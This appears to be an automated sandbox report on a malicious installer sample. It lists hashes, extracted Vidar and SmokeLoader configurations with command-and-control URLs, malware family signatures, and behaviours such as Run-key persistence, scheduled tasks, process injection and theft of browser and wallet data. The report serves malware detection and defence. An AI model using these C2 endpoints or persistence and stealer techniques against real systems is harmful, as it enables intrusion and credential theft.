Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
639s -
max time network
1814s -
platform
windows7_x64 -
resource
win7-de -
submitted
12-09-2021 18:18
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
3.4MB
-
MD5
7279aeead22b91c8176ee932377f2e27
-
SHA1
169aa33bbaacff9d2b1fbef2a8d06456d14c81dc
-
SHA256
8485c644c0a96ff0d9256b10e2c50ee462868432080b6f27869d96edf77a7d0e
-
SHA512
8ddaa2cd804602c0fdde5a85c96067b19338d074980fd0350839e68fea9b113d55af056a3ac3cbb04c47b9ef819c4840031a9fcb817d7a45bb2e35d0184d7697
Malware Config
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
metasploit
windows/single_exec
Extracted
vidar
40.5
328
https://gheorghip.tumblr.com/
-
profile_id
328
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba Payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/820-307-0x0000000003B20000-0x000000000443E000-memory.dmp family_glupteba behavioral4/memory/820-309-0x0000000000400000-0x0000000001BB7000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2740 2844 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3616 2844 rundll32.exe -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS09618E34\Sun150faeb3537d.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS09618E34\Sun150faeb3537d.exe family_socelars \Users\Admin\AppData\Local\Temp\7zS09618E34\Sun150faeb3537d.exe family_socelars -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Vidar Stealer 4 IoCs
Processes:
resource yara_rule behavioral4/memory/1316-178-0x00000000030B0000-0x0000000003181000-memory.dmp family_vidar behavioral4/memory/1316-181-0x0000000000400000-0x00000000017F4000-memory.dmp family_vidar behavioral4/memory/2400-355-0x0000000003330000-0x0000000003401000-memory.dmp family_vidar behavioral4/memory/2400-356-0x0000000000400000-0x00000000017F4000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS09618E34\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS09618E34\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS09618E34\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS09618E34\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS09618E34\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS09618E34\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 64 IoCs
Processes:
MsiExec.exeflow pid process 216 3820 MsiExec.exe 219 3820 MsiExec.exe 222 3820 MsiExec.exe 241 3820 MsiExec.exe 244 3820 MsiExec.exe 247 3820 MsiExec.exe 249 3820 MsiExec.exe 251 3820 MsiExec.exe 252 3820 MsiExec.exe 253 3820 MsiExec.exe 255 3820 MsiExec.exe 256 3820 MsiExec.exe 258 3820 MsiExec.exe 259 3820 MsiExec.exe 261 3820 MsiExec.exe 262 3820 MsiExec.exe 263 3820 MsiExec.exe 264 3820 MsiExec.exe 265 3820 MsiExec.exe 266 3820 MsiExec.exe 267 3820 MsiExec.exe 270 3820 MsiExec.exe 271 3820 MsiExec.exe 272 3820 MsiExec.exe 273 3820 MsiExec.exe 274 3820 MsiExec.exe 275 3820 MsiExec.exe 276 3820 MsiExec.exe 277 3820 MsiExec.exe 279 3820 MsiExec.exe 280 3820 MsiExec.exe 281 3820 MsiExec.exe 282 3820 MsiExec.exe 284 3820 MsiExec.exe 285 3820 MsiExec.exe 286 3820 MsiExec.exe 288 3820 MsiExec.exe 289 3820 MsiExec.exe 290 3820 MsiExec.exe 291 3820 MsiExec.exe 292 3820 MsiExec.exe 294 3820 MsiExec.exe 295 3820 MsiExec.exe 296 3820 MsiExec.exe 297 3820 MsiExec.exe 299 3820 MsiExec.exe 300 3820 MsiExec.exe 301 3820 MsiExec.exe 303 3820 MsiExec.exe 304 3820 MsiExec.exe 305 3820 MsiExec.exe 306 3820 MsiExec.exe 307 3820 MsiExec.exe 308 3820 MsiExec.exe 309 3820 MsiExec.exe 310 3820 MsiExec.exe 311 3820 MsiExec.exe 312 3820 MsiExec.exe 313 3820 MsiExec.exe 314 3820 MsiExec.exe 315 3820 MsiExec.exe 316 3820 MsiExec.exe 317 3820 MsiExec.exe 318 3820 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
46807GHF____.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts 46807GHF____.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeSun15b61bf18b0f1.exeSun152260a303c33a7.exeSun157ff8e4440aa.exeSun15223697c98.exeSun150d896340a863.exeSun15b61bf18b0f1.tmpSun1584240df9fe73a3.exeSun157a449716c8ee483.exeSun150faeb3537d.exe46807GHF____.exe7056889.exeLzmwAqmV.exe4706992.exe1366689.exeChrome 5.exePublicDwlBrowser1100.exeKuwicakiqy.exeWinHoster.exesetup.exeudptest.exesetup_2.exe3002.exejhuuee.exesetup_2.tmp8.exeBearVpn 3.exe3002.exesetup_2.exesetup_2.tmpLzmwAqmV.exepostback.exeultramediaburner.exeultramediaburner.tmpUltraMediaBurner.exeCydufoquca.exe2170890.exebOUQ9Vv9X.exe4633951.exe110483.exe4633951.exeservices64.exeLzmwAqmV.exeGcleanerEU.exeinstaller.exeanyname.exegcleaner.exeGu1Vb1CrZ.exesihost64.exeD375.exe12D6.exe12D6.exe602C.exe12D6.exe12D6.exebuild2.exeschtasks.exebuild2.exebuild3.exemstsca.exeuwbfggwAdvancedWindowsManager.exepid process 1680 setup_installer.exe 740 setup_install.exe 1412 Sun15b61bf18b0f1.exe 1676 Sun152260a303c33a7.exe 1128 Sun157ff8e4440aa.exe 1892 Sun15223697c98.exe 1316 Sun150d896340a863.exe 1064 Sun15b61bf18b0f1.tmp 944 Sun1584240df9fe73a3.exe 1604 Sun157a449716c8ee483.exe 2064 Sun150faeb3537d.exe 2600 46807GHF____.exe 2684 7056889.exe 2664 LzmwAqmV.exe 2804 4706992.exe 2908 1366689.exe 3052 Chrome 5.exe 1760 PublicDwlBrowser1100.exe 1644 Kuwicakiqy.exe 2212 WinHoster.exe 1672 setup.exe 2264 udptest.exe 2424 setup_2.exe 1696 3002.exe 1944 jhuuee.exe 2484 setup_2.tmp 1160 8.exe 2832 BearVpn 3.exe 2836 3002.exe 2372 setup_2.exe 3016 setup_2.tmp 820 LzmwAqmV.exe 2660 postback.exe 1292 ultramediaburner.exe 2060 ultramediaburner.tmp 1644 Kuwicakiqy.exe 1680 UltraMediaBurner.exe 572 Cydufoquca.exe 2872 2170890.exe 2400 bOUQ9Vv9X.exe 1656 4633951.exe 2628 110483.exe 268 4633951.exe 2452 services64.exe 3096 LzmwAqmV.exe 3492 GcleanerEU.exe 3628 installer.exe 3724 anyname.exe 3832 gcleaner.exe 3980 Gu1Vb1CrZ.exe 2632 sihost64.exe 2792 D375.exe 1544 12D6.exe 3868 12D6.exe 3648 602C.exe 2032 12D6.exe 3944 12D6.exe 3280 build2.exe 3704 schtasks.exe 3696 build2.exe 3884 build3.exe 3920 mstsca.exe 3692 uwbfggw 3264 AdvancedWindowsManager.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.exeSun15b61bf18b0f1.exeSun150d896340a863.exeSun15223697c98.execmd.execmd.execmd.exeSun157a449716c8ee483.exeSun15b61bf18b0f1.tmpSun150faeb3537d.exeLzmwAqmV.exe4706992.exe1366689.exeWerFault.exeWinHoster.exesetup.exeudptest.exesetup_2.exepid process 1888 setup_x86_x64_install.exe 1680 setup_installer.exe 1680 setup_installer.exe 1680 setup_installer.exe 1680 setup_installer.exe 1680 setup_installer.exe 1680 setup_installer.exe 740 setup_install.exe 740 setup_install.exe 740 setup_install.exe 740 setup_install.exe 740 setup_install.exe 740 setup_install.exe 740 setup_install.exe 740 setup_install.exe 1780 cmd.exe 380 cmd.exe 1640 cmd.exe 1308 cmd.exe 1308 cmd.exe 856 cmd.exe 856 cmd.exe 1412 Sun15b61bf18b0f1.exe 1412 Sun15b61bf18b0f1.exe 1412 Sun15b61bf18b0f1.exe 1316 Sun150d896340a863.exe 1316 Sun150d896340a863.exe 1892 Sun15223697c98.exe 1892 Sun15223697c98.exe 1484 cmd.exe 804 cmd.exe 804 cmd.exe 304 cmd.exe 1604 Sun157a449716c8ee483.exe 1604 Sun157a449716c8ee483.exe 1064 Sun15b61bf18b0f1.tmp 1064 Sun15b61bf18b0f1.tmp 1064 Sun15b61bf18b0f1.tmp 2064 Sun150faeb3537d.exe 2064 Sun150faeb3537d.exe 1064 Sun15b61bf18b0f1.tmp 2664 LzmwAqmV.exe 2664 LzmwAqmV.exe 2804 4706992.exe 2804 4706992.exe 2908 1366689.exe 2908 1366689.exe 2664 LzmwAqmV.exe 2664 LzmwAqmV.exe 2664 LzmwAqmV.exe 2664 LzmwAqmV.exe 1208 WerFault.exe 1208 WerFault.exe 1208 WerFault.exe 2804 4706992.exe 2212 WinHoster.exe 2212 WinHoster.exe 2664 LzmwAqmV.exe 2664 LzmwAqmV.exe 1672 setup.exe 2664 LzmwAqmV.exe 2264 udptest.exe 2264 udptest.exe 2424 setup_2.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
12D6.exe4706992.exe46807GHF____.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\056de9b2-9931-4ac9-a925-1093ae15e65e\\12D6.exe\" --AutoStart" 12D6.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 4706992.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Maevylyloshe.exe\"" 46807GHF____.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeinstaller.exedescription ioc process File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\O: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 209 api.2ip.ua 7866 api.ipify.org 9791 api.2ip.ua 6205 api.ipify.org 8203 api.ipify.org 9348 api.ipify.org 9349 api.ipify.org 210 api.2ip.ua 231 api.2ip.ua 3180 api.ipify.org 11 ip-api.com 7108 whatismyip.akamai.com 7890 whatismyip.akamai.com 9790 api.2ip.ua -
Suspicious use of SetThreadContext 9 IoCs
Processes:
postback.exe4633951.exeservices64.exe12D6.exe12D6.exebuild2.exeschtasks.exemstsca.exemstsca.exedescription pid process target process PID 2660 set thread context of 392 2660 postback.exe explorer.exe PID 1656 set thread context of 268 1656 4633951.exe 4633951.exe PID 2452 set thread context of 3840 2452 services64.exe explorer.exe PID 1544 set thread context of 3868 1544 12D6.exe 12D6.exe PID 2032 set thread context of 3944 2032 12D6.exe 12D6.exe PID 3280 set thread context of 3696 3280 build2.exe build2.exe PID 3704 set thread context of 3884 3704 schtasks.exe build3.exe PID 3920 set thread context of 8132 3920 mstsca.exe mstsca.exe PID 8376 set thread context of 8864 8376 mstsca.exe mstsca.exe -
Drops file in Program Files directory 18 IoCs
Processes:
46807GHF____.exemsiexec.exeultramediaburner.tmpsetup_2.tmpdescription ioc process File created C:\Program Files\Reference Assemblies\KWBBASTOMS\ultramediaburner.exe.config 46807GHF____.exe File created C:\Program Files (x86)\Windows Mail\Maevylyloshe.exe.config 46807GHF____.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe msiexec.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk msiexec.exe File created C:\Program Files (x86)\UltraMediaBurner\is-JNQ9N.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini msiexec.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\Windows Mail\Maevylyloshe.exe 46807GHF____.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url msiexec.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe File created C:\Program Files (x86)\FarLabUninstaller\is-5KANG.tmp setup_2.tmp File created C:\Program Files\Reference Assemblies\KWBBASTOMS\ultramediaburner.exe 46807GHF____.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-SFK78.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp -
Drops file in Windows directory 30 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\MSI35F1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8E85.tmp msiexec.exe File created C:\Windows\Installer\f762944.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI1C3B.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\Installer\f762942.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID893.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF20.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4F10.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI79D9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8688.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9E6D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI188.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2C33.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI4BC4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7F08.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI4933.tmp msiexec.exe File opened for modification C:\Windows\Installer\f762942.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIA1A9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3900.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF5D4.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\Installer\f762946.msi msiexec.exe File opened for modification C:\Windows\Installer\f762944.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI5078.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4D5A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI51DF.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1208 1316 WerFault.exe Sun150d896340a863.exe 2948 1160 WerFault.exe 8.exe 2440 1656 WerFault.exe 4633951.exe 2796 2908 WerFault.exe 1366689.exe 2708 2684 WerFault.exe 7056889.exe 1920 2628 WerFault.exe 110483.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
uwbfggwcmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uwbfggw Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uwbfggw Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uwbfggw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cmd.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cmd.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cmd.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
bOUQ9Vv9X.exebuild2.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 bOUQ9Vv9X.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString bOUQ9Vv9X.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2928 schtasks.exe 2232 schtasks.exe 3704 schtasks.exe 8576 schtasks.exe 1412 schtasks.exe 1996 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 3676 timeout.exe 764 timeout.exe 5768 timeout.exe -
Kills process with taskkill 8 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3220 taskkill.exe 1340 taskkill.exe 2384 taskkill.exe 1640 taskkill.exe 3216 taskkill.exe 1712 taskkill.exe 3728 taskkill.exe 3068 taskkill.exe -
Processes:
IEXPLORE.EXEIEXPLORE.EXEiexplore.exeIEXPLORE.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "28" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "800" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "75" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "950" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "75" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{96E37D80-13F5-11EC-B1DD-DAC00DB4565F} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "9" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "47" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "47" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "90" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "800" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "28" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "47" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "800" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "90" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value 